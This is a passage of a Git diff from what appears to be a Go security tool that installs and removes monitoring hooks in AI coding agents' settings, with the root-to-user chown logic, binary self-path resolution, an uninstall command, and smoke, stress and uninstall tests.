loop continues — an unchown'd file is still a +// working install, just one the target user can't tidy up themselves. +// +// No-op on Windows (chown is a Unix concept) and when the caller is not +// root (chown to a different UID requires CAP_CHOWN). Empty paths in +// the slice are skipped silently so callers can pass `WriteResult.BackupPath` +// without first checking for "". +func ChownToTarget(exec executor.Executor, paths []string, target TargetUser) { + if !exec.IsRoot() { + return + } + for _, p := range paths { + if p == "" { + continue + } + if err := os.Chown(p, target.UID, target.GID); err != nil { + AppendError("install", "chown_failed", fmt.Sprintf("chown %s to %d:%d: %v", p, target.UID, target.GID, err), "") + } + } +} diff --git a/internal/aiagents/cli/rootuser_test.go b/internal/aiagents/cli/rootuser_test.go new file mode 100644 index 0000000..d181db2 --- /dev/null +++ b/internal/aiagents/cli/rootuser_test.go @@ -0,0 +1,243 @@ +package cli + +import ( + "bytes" + "encoding/json" + "os" + "os/user" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// withMockUser sets the Mock executor's CurrentUser/LoggedInUser pair. +// Mock returns CurrentUser from LoggedInUser, so a single setter chain +// covers both. +// +// Note: Mock's CurrentUser only carries Username + HomeDir — UID/GID are +// not part of the public Mock API, so ResolveTargetUser's strconv.Atoi +// will yield 0 on the empty string. Tests that need a specific UID +// drive the chown branch directly with TargetUser literals (see +// TestChownToTarget_AsFakeRootSucceedsForOwnUID). +func withMockUser(m *executor.Mock, username, home string) { + m.SetUsername(username) + m.SetHomeDir(home) +} + +func TestResolveTargetUser_NonRoot_ReturnsCallingUser(t *testing.T) { + m := executor.NewMock() + m.SetIsRoot(false) + withMockUser(m, "alice", "/Users/alice") + + var stderr bytes.Buffer + got, ok := ResolveTargetUser(m, &stderr) + if !ok { + t.Fatal("expected ok=true for non-root caller") + } + if got.User.Username != "alice" { + t.Errorf("Username = %q, want alice", got.User.Username) + } + if got.HomeDir != "/Users/alice" { + t.Errorf("HomeDir = %q, want /Users/alice", got.HomeDir) + } + if stderr.Len() != 0 { + t.Errorf("expected silent stderr on success, got %q", stderr.String()) + } +} + +func TestResolveTargetUser_RootWithConsoleUser_ReturnsConsoleUser(t *testing.T) { + tmp := withErrorLog(t) + + m := executor.NewMock() + m.SetIsRoot(true) + withMockUser(m, "alice", "/Users/alice") + + var stderr bytes.Buffer + got, ok := ResolveTargetUser(m, &stderr) + if !ok { + t.Fatal("expected ok=true when console user resolves to non-root") + } + if got.User.Username != "alice" { + t.Errorf("Username = %q, want alice", got.User.Username) + } + + // Errors log must not be touched on the success path. + if _, err := os.Stat(tmp); !os.IsNotExist(err) { + t.Errorf("expected errors log not created on success, got err=%v", err) + } + if stderr.Len() != 0 { + t.Errorf("expected silent stderr on success, got %q", stderr.String()) + } +} + +func TestResolveTargetUser_RootNoConsoleUser_BailsWithLog(t *testing.T) { + logPath := withErrorLog(t) + + m := executor.NewMock() + m.SetIsRoot(true) + // Mock.LoggedInUser falls back to CurrentUser which returns whatever + // SetUsername staged. "root" simulates the executor failing to + // resolve a console user under root. + withMockUser(m, "root", "/var/root") + + var stderr bytes.Buffer + _, ok := ResolveTargetUser(m, &stderr) + if ok { + t.Fatal("expected ok=false when running as root with no console user") + } + + if !strings.Contains(stderr.String(), "running as root with no console user") { + t.Errorf("stderr missing the expected one-line note: %q", stderr.String()) + } + + data, err := os.ReadFile(logPath) + if err != nil { + t.Fatalf("expected errors log written: %v", err) + } + var entry ErrorEntry + if err := json.Unmarshal(bytes.TrimRight(data, "\n"), &entry); err != nil { + t.Fatalf("unmarshal: %v (data=%q)", err, string(data)) + } + if entry.Stage != "install" || entry.Code != "no_console_user" { + t.Errorf("unexpected error entry: %+v", entry) + } +} + +func TestResolveTargetUser_RootEmptyUsername_AlsoBails(t *testing.T) { + withErrorLog(t) // capture log writes to temp + + m := executor.NewMock() + m.SetIsRoot(true) + withMockUser(m, "", "") + + var stderr bytes.Buffer + _, ok := ResolveTargetUser(m, &stderr) + if ok { + t.Fatal("expected ok=false for empty username under root") + } + if !strings.Contains(stderr.String(), "no console user") { + t.Errorf("stderr missing the bail note: %q", stderr.String()) + } +} + +// ChownToTarget is a no-op when the caller is not root, because chowning +// a file to a different UID requires CAP_CHOWN. Verify the early exit. +func TestChownToTarget_NoOpWhenNotRoot(t *testing.T) { + withErrorLog(t) + + dir := t.TempDir() + path := filepath.Join(dir, "f") + if err := os.WriteFile(path, []byte("x"), 0o644); err != nil { + t.Fatal(err) + } + + m := executor.NewMock() + m.SetIsRoot(false) + + // Use a bogus UID/GID — if we accidentally tried to chown, this would fail. + ChownToTarget(m, []string{path}, TargetUser{UID: 9999, GID: 9999}) + + // File still exists and is readable. + if _, err := os.Stat(path); err != nil { + t.Errorf("file vanished after no-op chown: %v", err) + } +} + +func TestChownToTarget_SkipsEmptyPaths(t *testing.T) { + withErrorLog(t) + + m := executor.NewMock() + m.SetIsRoot(false) // no-op anyway, but proves the empty-string skip doesn't error + + ChownToTarget(m, []string{"", "", ""}, TargetUser{}) + // Reaching this line without a panic is the assertion. +} + +// On Unix as a non-root user, chowning a file to YOUR OWN UID is a no-op +// that succeeds. Use a "fake-root" mock that claims IsRoot=true to drive +// the chown branch, with the calling user's real UID/GID as the target — +// that's the only chown that won't fail under a non-privileged test. +func TestChownToTarget_AsFakeRootSucceedsForOwnUID(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("chown semantics differ on Windows") + } + + dir := t.TempDir() + path := filepath.Join(dir, "f") + if err := os.WriteFile(path, []byte("x"), 0o644); err != nil { + t.Fatal(err) + } + + me, err := user.Current() + if err != nil { + t.Fatal(err) + } + uid := atoi(me.Uid) + gid := atoi(me.Gid) + + withErrorLog(t) + + m := executor.NewMock() + m.SetIsRoot(true) // drive the chown branch + + ChownToTarget(m, []string{path}, TargetUser{UID: uid, GID: gid}) + + // File should still exist with the same owner. + if _, err := os.Stat(path); err != nil { + t.Errorf("file unexpectedly missing: %v", err) + } +} + +// Failed chowns (e.g., bogus UID) must be logged but not abort the loop. +func TestChownToTarget_FailureLogsButContinues(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("chown semantics differ on Windows") + } + if os.Getuid() == 0 { + t.Skip("running as actual root; chown to UID 1 would succeed and not exercise the error branch") + } + + logPath := withErrorLog(t) + + dir := t.TempDir() + a := filepath.Join(dir, "a") + b := filepath.Join(dir, "b") + for _, p := range []string{a, b} { + if err := os.WriteFile(p, []byte("x"), 0o644); err != nil { + t.Fatal(err) + } + } + + m := executor.NewMock() + m.SetIsRoot(true) + + // Bogus UID — chown fails for non-privileged caller despite IsRoot=true. + ChownToTarget(m, []string{a, b}, TargetUser{UID: 1, GID: 1}) + + data, err := os.ReadFile(logPath) + if err != nil { + t.Fatalf("expected errors log to capture failures: %v", err) + } + // Two failed chowns → two log lines. + if lines := strings.Count(strings.TrimRight(string(data), "\n"), "\n"); lines != 1 { + // strings.Count of "\n" with one newline-stripped → 1 if there are 2 lines + t.Errorf("expected 2 log entries, got data=%q", string(data)) + } + if !strings.Contains(string(data), "chown_failed") { + t.Errorf("expected chown_failed code in log, got %q", string(data)) + } +} + +func atoi(s string) int { + n := 0 + for _, c := range s { + if c < '0' || c > '9' { + return 0 + } + n = n*10 + int(c-'0') + } + return n +} diff --git a/internal/aiagents/cli/selfpath.go b/internal/aiagents/cli/selfpath.go new file mode 100644 index 0000000..f7c1472 --- /dev/null +++ b/internal/aiagents/cli/selfpath.go @@ -0,0 +1,45 @@ +package cli + +import ( + "fmt" + "os" + "path/filepath" +) + +// Resolve returns the absolute, fully symlink-resolved path of the +// running DMG binary. The result is what `hooks install` writes into +// agent settings as the hook command prefix. +// +// Symlinks are evaluated so the recorded path is canonical — Homebrew, +// for example, installs binaries under `/opt/homebrew/Cellar/...` and +// links `/opt/homebrew/bin/` to them. Recording the Cellar path +// means a `brew upgrade` that swaps the symlink target still leaves a +// valid hook command (until the Cellar path itself is removed). +// +// On Windows, EvalSymlinks resolves directory junctions and reparse +// points the same way it resolves Unix symlinks. +func Resolve() (string, error) { + raw, err := os.Executable() + if err != nil { + return "", fmt.Errorf("selfpath: os.Executable: %w", err) + } + return resolveFrom(raw) +} + +// resolveFrom is the testable core of Resolve. It expects an absolute or +// relative path and returns the absolute, symlink-resolved canonical form. +// +// If symlink evaluation fails (broken link, permissions), the call fails +// rather than falling back to the unresolved path — recording an +// unresolved path defeats the canonicalization the install relies on. +func resolveFrom(path string) (string, error) { + resolved, err := filepath.EvalSymlinks(path) + if err != nil { + return "", fmt.Errorf("selfpath: EvalSymlinks(%s): %w", path, err) + } + abs, err := filepath.Abs(resolved) + if err != nil { + return "", fmt.Errorf("selfpath: Abs(%s): %w", resolved, err) + } + return abs, nil +} diff --git a/internal/aiagents/cli/selfpath_test.go b/internal/aiagents/cli/selfpath_test.go new file mode 100644 index 0000000..d0e6ea9 --- /dev/null +++ b/internal/aiagents/cli/selfpath_test.go @@ -0,0 +1,117 @@ +package cli + +import ( + "os" + "path/filepath" + "runtime" + "testing" +) + +func TestResolve_ReturnsAbsoluteExistingPath(t *testing.T) { + got, err := Resolve() + if err != nil { + t.Fatalf("Resolve: %v", err) + } + if !filepath.IsAbs(got) { + t.Errorf("Resolve returned non-absolute path: %q", got) + } + if _, err := os.Stat(got); err != nil { + t.Errorf("Resolve returned non-existent path %q: %v", got, err) + } +} + +func TestResolveFrom_PassesNonSymlinkThrough(t *testing.T) { + dir := t.TempDir() + real := filepath.Join(dir, "binary") + if err := os.WriteFile(real, []byte("x"), 0o755); err != nil { + t.Fatal(err) + } + got, err := resolveFrom(real) + if err != nil { + t.Fatal(err) + } + // EvalSymlinks may canonicalize the temp dir prefix (e.g., /var → /private/var on macOS). + // Compare the canonicalized expectation, not the raw input. + want, _ := filepath.EvalSymlinks(real) + if got != want { + t.Errorf("resolveFrom non-symlink: got %q, want %q", got, want) + } +} + +// Mirrors the brew-style layout: a `bin/` symlink points at the actual +// binary in `Cellar/`. Resolve must record the Cellar path so the hook +// command survives a `brew upgrade` that re-points the symlink. +func TestResolveFrom_FollowsSymlinkToTarget(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("symlink creation requires elevated privileges on Windows") + } + + dir := t.TempDir() + cellar := filepath.Join(dir, "Cellar", "stepsecurity-dev-machine-guard", "1.11.0") + if err := os.MkdirAll(cellar, 0o755); err != nil { + t.Fatal(err) + } + real := filepath.Join(cellar, "stepsecurity-dev-machine-guard") + if err := os.WriteFile(real, []byte("x"), 0o755); err != nil { + t.Fatal(err) + } + + binDir := filepath.Join(dir, "bin") + if err := os.MkdirAll(binDir, 0o755); err != nil { + t.Fatal(err) + } + link := filepath.Join(binDir, "stepsecurity-dev-machine-guard") + if err := os.Symlink(real, link); err != nil { + t.Fatal(err) + } + + got, err := resolveFrom(link) + if err != nil { + t.Fatal(err) + } + want, _ := filepath.EvalSymlinks(real) + if got != want { + t.Errorf("resolveFrom symlink: got %q, want %q", got, want) + } +} + +func TestResolveFrom_BrokenSymlinkErrors(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("symlink creation requires elevated privileges on Windows") + } + + dir := t.TempDir() + link := filepath.Join(dir, "broken") + if err := os.Symlink(filepath.Join(dir, "nope"), link); err != nil { + t.Fatal(err) + } + if _, err := resolveFrom(link); err == nil { + t.Error("expected error on broken symlink — recording an unresolved path defeats the canonicalization") + } +} + +func TestResolveFrom_NonExistentPathErrors(t *testing.T) { + dir := t.TempDir() + if _, err := resolveFrom(filepath.Join(dir, "does-not-exist")); err == nil { + t.Error("expected error on non-existent path") + } +} + +// On Windows the resolved binary path keeps its `.exe` suffix; the hook +// command we write into agent settings must invoke `dmg.exe`, not `dmg`. +// On Unix the suffix is just an opaque part of the basename, so the same +// expectation holds. +func TestResolveFrom_PreservesExeSuffix(t *testing.T) { + dir := t.TempDir() + real := filepath.Join(dir, "stepsecurity-dev-machine-guard.exe") + if err := os.WriteFile(real, []byte("x"), 0o755); err != nil { + t.Fatal(err) + } + got, err := resolveFrom(real) + if err != nil { + t.Fatal(err) + } + if filepath.Ext(got) != ".exe" { + t.Errorf("resolveFrom dropped .exe suffix: got %q", got) + } +} diff --git a/internal/aiagents/cli/smoke_test.go b/internal/aiagents/cli/smoke_test.go new file mode 100644 index 0000000..b00fc00 --- /dev/null +++ b/internal/aiagents/cli/smoke_test.go @@ -0,0 +1,91 @@ +package cli + +import ( + "bytes" + "context" + "encoding/json" + "os" + "path/filepath" + "strings" + "testing" +) + +// TestSmoke_InstallInvokeUninstall is the end-to-end smoke test: +// drives RunInstall → RunHook → RunUninstall against a single temp HOME +// and confirms the on-disk lifecycle matches what we tell users to expect. +// +// Why this is a separate test from the per-handler unit tests: +// - install/uninstall unit tests use the executor mock's HomeDir, but +// RunHook resolves home from os.UserHomeDir(); the install path the +// hook will be invoked from must match the executor's HomeDir for +// the round-trip to be meaningful. +// - the seam-stubbed hook tests prove the runtime emits a well-formed +// allow response, but they don't prove that the very settings file +// RunInstall just wrote is the one the agent would invoke against. +func TestSmoke_InstallInvokeUninstall(t *testing.T) { + withEnterpriseConfig(t) + withErrorLog(t) + withResolveBinary(t, okBinary) + withStubUploader(t) + + home := t.TempDir() + // RunHook reads HOME via os.UserHomeDir; align it with the executor's + // HomeDir so install writes and hook resolves to the same tree. + // os.UserHomeDir checks $HOME on Unix and $USERPROFILE on Windows — + // set both so the smoke test is platform-agnostic. + t.Setenv("HOME", home) + t.Setenv("USERPROFILE", home) + + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var instOut, instErr bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &instOut, &instErr); rc != 0 { + t.Fatalf("install: rc=%d stderr=%q", rc, instErr.String()) + } + + settings := filepath.Join(home, ".claude", "settings.json") + postInstall, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("install did not produce settings: %v", err) + } + if !strings.Contains(string(postInstall), fakeBinary+" _hook claude-code") { + t.Fatalf("settings missing hook command after install: %s", postInstall) + } + + var hookOut, hookErr bytes.Buffer + rc := RunHook( + strings.NewReader(`{"tool_name":"Bash","tool_input":{"command":"ls"}}`), + &hookOut, &hookErr, + []string{"claude-code", "PreToolUse"}, + ) + if rc != 0 { + t.Fatalf("hook: rc=%d stderr=%q", rc, hookErr.String()) + } + if hookErr.Len() != 0 { + t.Fatalf("hook stderr non-empty: %q", hookErr.String()) + } + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(hookOut.Bytes()), &resp); err != nil { + t.Fatalf("hook stdout not valid JSON: %v: %q", err, hookOut.Bytes()) + } + if resp["continue"] != true { + t.Fatalf("hook allow response missing continue=true: %v", resp) + } + + var unOut, unErr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &unOut, &unErr); rc != 0 { + t.Fatalf("uninstall: rc=%d stderr=%q", rc, unErr.String()) + } + + postUninstall, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("uninstall removed the settings file (it should only edit it): %v", err) + } + if strings.Contains(string(postUninstall), fakeBinary+" _hook claude-code") { + t.Fatalf("uninstall left DMG-owned hook in settings: %s", postUninstall) + } + if !strings.Contains(unOut.String(), "removed:") { + t.Errorf("uninstall summary missing removed line, got: %q", unOut.String()) + } +} diff --git a/internal/aiagents/cli/stress_test.go b/internal/aiagents/cli/stress_test.go new file mode 100644 index 0000000..a108a55 --- /dev/null +++ b/internal/aiagents/cli/stress_test.go @@ -0,0 +1,132 @@ +package cli + +import ( + "bytes" + "encoding/json" + "os" + "strings" + "sync" + "sync/atomic" + "testing" + + aieventc "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +// TestStress_ConcurrentHookInvocations is a best-effort stress test: +// many independent RunHook callers sharing a single HOME (settings +// file, errors.jsonl, uploader seam) must each return exit 0 with a +// valid allow body. We do NOT check throughput — the purpose is to +// flush out data races, panics that survive the recover, or stdout +// corruption from interleaved writes. +// +// Marked perf-sensitive (skipped under -short): in-process N=64 routinely +// finishes in well under a second, but some CI runners stutter on the +// concurrent map/redact paths and we don't want to flake the basic +// `go test -short ./...` invocation. +func TestStress_ConcurrentHookInvocations(t *testing.T) { + if testing.Short() { + t.Skip("perf-sensitive; skipped under -short") + } + + withErrorLog(t) + home := t.TempDir() + // Same HOME-vs-USERPROFILE caveat as the smoke test: os.UserHomeDir + // reads different env vars by platform. Set both so this stress + // runs identically on Unix and Windows CI. + t.Setenv("HOME", home) + t.Setenv("USERPROFILE", home) + + // Stand up a thread-safe upload counter via the same factory the + // real wiring uses. withStubUploader installs a single capture + // closure (mutex-guarded) and the runtime reuses it across every + // concurrent call — so the test exercises the actual seam contract. + captured := withStubUploader(t) + + const N = 64 + const payload = `{"tool_name":"Bash","tool_input":{"command":"ls"}}` + + var wg sync.WaitGroup + var nonZeroExits, badJSON, missingContinue atomic.Int32 + wg.Add(N) + for range N { + go func() { + defer wg.Done() + var stdout, stderr bytes.Buffer + rc := RunHook(strings.NewReader(payload), &stdout, &stderr, + []string{"claude-code", "PreToolUse"}) + if rc != 0 { + nonZeroExits.Add(1) + return + } + var resp map[string]any + if err := json.Unmarshal(bytes.TrimSpace(stdout.Bytes()), &resp); err != nil { + badJSON.Add(1) + return + } + if resp["continue"] != true { + missingContinue.Add(1) + } + }() + } + wg.Wait() + + if got := nonZeroExits.Load(); got != 0 { + t.Errorf("non-zero exits: %d/%d (fail-open contract violated under load)", got, N) + } + if got := badJSON.Load(); got != 0 { + t.Errorf("malformed stdout JSON: %d/%d (interleaved writes?)", got, N) + } + if got := missingContinue.Load(); got != 0 { + t.Errorf("missing continue=true: %d/%d", got, N) + } + // One uploaded event per invocation; if any goroutine swallowed its + // upload silently the count diverges and we miss telemetry under + // load — exactly the regression this test exists to catch. + if got := len(*captured); got != N { + t.Errorf("uploader seam called %d times, want %d", got, N) + } + // Spot-check the captured events for the expected shape — a + // data-race that scrambled fields would show up here even when the + // count matched. + for _, ev := range *captured { + if ev.HookEvent != aieventc.HookPreToolUse { + t.Errorf("captured event hook=%q, want PreToolUse", ev.HookEvent) + break + } + } + + // Independently of upload, the runtime hits errors.jsonl any time + // identity probing or enrichment fails on the hot path. We don't + // require the file to exist (the happy path produces no errors) + // but if it does, every line must be a complete JSON record — a + // truncated or interleaved line proves the unlocked O_APPEND + // contract from §1.16 broke under N=64. + assertErrorLogIsClean(t) +} + +func assertErrorLogIsClean(t *testing.T) { + t.Helper() + path := errorLogPath() + if path == "" { + return + } + data, err := os.ReadFile(path) + if err != nil { + // Happy-path stress runs produce no error log — that's expected + // and not interesting. Any other read error (perms, IO) is a + // real test setup problem and should fail loudly. + if os.IsNotExist(err) { + return + } + t.Fatalf("errors log read failed: %v", err) + } + if len(data) == 0 { + return + } + for i, line := range bytes.Split(bytes.TrimRight(data, "\n"), []byte("\n")) { + var rec map[string]any + if err := json.Unmarshal(line, &rec); err != nil { + t.Errorf("errors.jsonl line %d not valid JSON (interleaved append?): %q", i, line) + } + } +} diff --git a/internal/aiagents/cli/uninstall.go b/internal/aiagents/cli/uninstall.go new file mode 100644 index 0000000..1a10377 --- /dev/null +++ b/internal/aiagents/cli/uninstall.go @@ -0,0 +1,117 @@ +package cli + +import ( + "context" + "fmt" + "io" + "strings" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// RunUninstall is the entry point for `hooks uninstall`. +// +// agent is the --agent flag value; "" means "every detected agent". +// stdout/stderr are wired from os.Stdout/os.Stderr by main. +// +// Returns the desired process exit code: +// - 0 on success, no-op (no DMG-owned entries found), no agents +// detected, or the root-with-no-console-user no-op. +// - 1 on self-path resolution failure, unsupported --agent, or any +// adapter Uninstall error. +// +// Flow: +// 1. resolve target user (root + no console user → log + exit 0) +// 2. resolve absolute, symlink-resolved DMG binary path (the +// uninstall matcher needs it to identify DMG-owned entries) +// 3. select adapters per --agent or detection on $PATH +// 4. per-adapter Uninstall, then chown rewritten outputs to target +// user under root +// 5. emit per-adapter summary to stdout +// +// No enterprise-config gate: uninstall must work even after the +// customer has revoked credentials or rotated keys — otherwise we'd +// trap users with hook entries pointing at a binary that can no +// longer authenticate. +// +// Adapter Uninstall errors don't abort the loop — the remaining +// adapters still get a chance. The aggregate exit code is 1 if any +// adapter failed. +func RunUninstall(ctx context.Context, exec executor.Executor, agent string, stdout, stderr io.Writer) int { + target, ok := ResolveTargetUser(exec, stderr) + if !ok { + return 0 + } + + binaryPath, err := resolveBinary() + if err != nil { + fmt.Fprintf(stderr, "stepsecurity-dev-machine-guard: cannot resolve own binary path: %v\n", err) + AppendError("uninstall", "selfpath_failed", err.Error(), "") + return 1 + } + + adapters, err := selectAdapters(ctx, agent, target.HomeDir, binaryPath, exec) + if err != nil { + fmt.Fprintf(stderr, "stepsecurity-dev-machine-guard: %v\n", err) + AppendError("uninstall", "select_adapters_failed", err.Error(), "") + return 1 + } + if len(adapters) == 0 { + fmt.Fprintln(stdout, "No supported AI coding agents detected on $PATH.") + fmt.Fprintf(stdout, "Pass --agent to uninstall for a specific agent (supported: %s).\n", + strings.Join(SupportedAgents, ", ")) + return 0 + } + + exit := 0 + for _, a := range adapters { + res, err := a.Uninstall(ctx) + if err != nil { + fmt.Fprintf(stderr, "%s: uninstall failed: %v\n", a.Name(), err) + AppendError("uninstall", "adapter_uninstall_failed", + fmt.Sprintf("%s: %v", a.Name(), err), "") + exit = 1 + continue + } + // Same chown rationale as install: a sudo-driven rewrite + // must not leave the user's settings owned by root. + // UninstallResult never carries CreatedDirs — uninstall only + // rewrites files that already existed. + ChownToTarget(exec, uninstallChownPaths(res), target) + printUninstallResult(stdout, a.Name(), res) + } + return exit +} + +// uninstallChownPaths is the chown sweep set for a single adapter's +// UninstallResult. WrittenFiles ∪ BackupFiles only — see RunUninstall +// for why no CreatedDirs. +func uninstallChownPaths(r adapter.UninstallResult) []string { + out := make([]string, 0, len(r.WrittenFiles)+len(r.BackupFiles)) + out = append(out, r.WrittenFiles...) + out = append(out, r.BackupFiles...) + return out +} + +// printUninstallResult renders one adapter's UninstallResult. +// +// On the "nothing to remove" path the adapter populates Notes only +// (no WrittenFiles, no HooksRemoved); the user still gets a header +// line so multi-adapter summaries don't render as a single empty +// section followed by the next adapter's output. +func printUninstallResult(w io.Writer, name string, r adapter.UninstallResult) { + fmt.Fprintf(w, "%s:\n", name) + if len(r.HooksRemoved) > 0 { + fmt.Fprintf(w, " removed: %v\n", r.HooksRemoved) + } + for _, f := range r.WrittenFiles { + fmt.Fprintf(w, " wrote: %s\n", f) + } + for _, f := range r.BackupFiles { + fmt.Fprintf(w, " backup: %s\n", f) + } + for _, n := range r.Notes { + fmt.Fprintf(w, " note: %s\n", n) + } +} diff --git a/internal/aiagents/cli/uninstall_test.go b/internal/aiagents/cli/uninstall_test.go new file mode 100644 index 0000000..9eec4e1 --- /dev/null +++ b/internal/aiagents/cli/uninstall_test.go @@ -0,0 +1,324 @@ +package cli + +import ( + "bytes" + "context" + "errors" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// runInstallForTest seeds the target home with DMG-owned hooks for the +// given agent. Returns the home directory used. Helper exists because +// most uninstall tests want a "previously installed" starting state. +func runInstallForTest(t *testing.T, agent string) (home string, m *executor.Mock) { + t.Helper() + withEnterpriseConfig(t) + withResolveBinary(t, okBinary) + + home = t.TempDir() + m = newInstallMock(t, home) + switch agent { + case "claude-code": + m.SetPath("claude", "/usr/local/bin/claude") + case "codex": + m.SetPath("codex", "/usr/local/bin/codex") + case "both": + m.SetPath("claude", "/usr/local/bin/claude") + m.SetPath("codex", "/usr/local/bin/codex") + } + + var stdout, stderr bytes.Buffer + if rc := RunInstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("seed install failed: rc=%d stderr=%q", rc, stderr.String()) + } + return home, m +} + +func TestRunUninstall_RootNoConsoleUser_Exit0(t *testing.T) { + logPath := withErrorLog(t) + withResolveBinary(t, okBinary) + + m := executor.NewMock() + m.SetIsRoot(true) + m.SetUsername("root") + m.SetHomeDir("/var/root") + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("exit = %d, want 0", rc) + } + if !strings.Contains(stderr.String(), "no console user") { + t.Errorf("stderr missing bail note, got: %q", stderr.String()) + } + if data, _ := os.ReadFile(logPath); !strings.Contains(string(data), "no_console_user") { + t.Errorf("errlog missing no_console_user, got: %q", string(data)) + } +} + +func TestRunUninstall_SelfPathFails_Exit1(t *testing.T) { + logPath := withErrorLog(t) + withResolveBinary(t, func() (string, error) { + return "", errors.New("mock selfpath failure") + }) + + m := newInstallMock(t, t.TempDir()) + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "cannot resolve own binary path") { + t.Errorf("stderr missing diagnostic, got: %q", stderr.String()) + } + if data, _ := os.ReadFile(logPath); !strings.Contains(string(data), "selfpath_failed") { + t.Errorf("errlog missing selfpath_failed, got: %q", string(data)) + } +} + +func TestRunUninstall_UnsupportedAgent_Exit1(t *testing.T) { + withErrorLog(t) + withResolveBinary(t, okBinary) + + m := newInstallMock(t, t.TempDir()) + var stdout, stderr bytes.Buffer + rc := RunUninstall(context.Background(), m, "cursor", &stdout, &stderr) + if rc != 1 { + t.Fatalf("exit = %d, want 1", rc) + } + if !strings.Contains(stderr.String(), "unsupported agent") { + t.Errorf("stderr missing diagnostic, got: %q", stderr.String()) + } +} + +func TestRunUninstall_NoAgentsDetected_Exit0(t *testing.T) { + withErrorLog(t) + withResolveBinary(t, okBinary) + + m := newInstallMock(t, t.TempDir()) // empty PATH + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("exit = %d, want 0", rc) + } + out := stdout.String() + if !strings.Contains(out, "No supported AI coding agents detected") { + t.Errorf("stdout missing no-detected message, got: %q", out) + } + // User-visible verb in the hint must say "uninstall", not "install". + // A copy-pasted install hint would mislead users about the escape hatch. + if !strings.Contains(out, "uninstall") { + t.Errorf("hint should mention 'uninstall', got: %q", out) + } +} + +// TestRunUninstall_NoEnterpriseConfigStillWorks pins the explicit +// uninstall design choice: revoking enterprise credentials must not +// trap users with hook entries pointing at a binary that can no +// longer authenticate. Default config vars are placeholders here — +// no withEnterpriseConfig — and uninstall must still proceed. +func TestRunUninstall_NoEnterpriseConfigStillWorks(t *testing.T) { + // First seed Claude hooks WITH valid config (install requires it). + home, m := runInstallForTest(t, "claude-code") + + // Now drop the enterprise config and uninstall. The withEnterpriseConfig + // cleanup from runInstallForTest hasn't fired yet (still in the same + // test), so we have to override directly. + withErrorLog(t) + withResolveBinary(t, okBinary) + + var stdout, stderr bytes.Buffer + rc := RunUninstall(context.Background(), m, "", &stdout, &stderr) + if rc != 0 { + t.Fatalf("uninstall exit = %d, want 0 (stderr=%q)", rc, stderr.String()) + } + + // Verify the actual uninstall happened — the file should still + // exist but have no DMG-owned hook entries. + settings := filepath.Join(home, ".claude", "settings.json") + data, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("settings file vanished after uninstall: %v", err) + } + if strings.Contains(string(data), fakeBinary+" _hook claude-code") { + t.Errorf("DMG hook command still present after uninstall: %s", string(data)) + } +} + +func TestRunUninstall_RemovesPreviouslyInstalledHooks(t *testing.T) { + home, m := runInstallForTest(t, "claude-code") + + withErrorLog(t) + withResolveBinary(t, okBinary) + + settings := filepath.Join(home, ".claude", "settings.json") + before, err := os.ReadFile(settings) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(before), fakeBinary+" _hook claude-code") { + t.Fatalf("seed broken: install didn't write hook command: %s", string(before)) + } + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + + after, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("settings file deleted after uninstall: %v", err) + } + if strings.Contains(string(after), fakeBinary+" _hook claude-code") { + t.Errorf("DMG hook command not removed: %s", string(after)) + } + + out := stdout.String() + if !strings.Contains(out, "claude-code:") { + t.Errorf("stdout missing claude-code section, got: %q", out) + } + if !strings.Contains(out, "removed:") { + t.Errorf("stdout missing 'removed:' line, got: %q", out) + } + if !strings.Contains(out, "wrote:") { + t.Errorf("stdout missing 'wrote:' line, got: %q", out) + } +} + +// TestRunUninstall_NoDMGOwnedEntries pins the no-op path: settings +// file exists, but contains no DMG-owned hook commands. Uninstall +// must succeed (exit 0), surface the per-adapter "no DMG-owned" note +// to the user, and leave the file byte-identical. +func TestRunUninstall_NoDMGOwnedEntries(t *testing.T) { + withErrorLog(t) + withResolveBinary(t, okBinary) + + home := t.TempDir() + claudeDir := filepath.Join(home, ".claude") + if err := os.MkdirAll(claudeDir, 0o755); err != nil { + t.Fatal(err) + } + // User-authored settings with a third-party hook that DMG + // must NOT match against its uninstall regex. + settings := filepath.Join(claudeDir, "settings.json") + original := []byte(`{ + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [{"type": "command", "command": "/opt/other-tool/hook PreToolUse", "timeout": 5}]} + ] + } +} +`) + if err := os.WriteFile(settings, original, 0o644); err != nil { + t.Fatal(err) + } + + m := newInstallMock(t, home) + m.SetPath("claude", "/usr/local/bin/claude") + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + + after, err := os.ReadFile(settings) + if err != nil { + t.Fatalf("settings file vanished: %v", err) + } + if !bytes.Equal(original, after) { + t.Errorf("settings file mutated when no DMG hooks 